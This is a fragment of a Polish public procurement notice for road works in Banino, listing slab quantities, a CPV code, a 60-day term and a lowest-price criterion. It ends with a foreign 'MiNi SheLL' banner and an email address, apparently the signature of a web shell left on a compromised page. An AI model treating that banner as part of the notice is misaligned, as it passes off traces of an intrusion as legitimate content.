5)	modernizacja w Baninie:
a)	ul. Pszenna - 420 szt. płyt YOMB (kontynuacja)
b)	ul. Tuchomska - 1000 szt. płyt YOMB..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com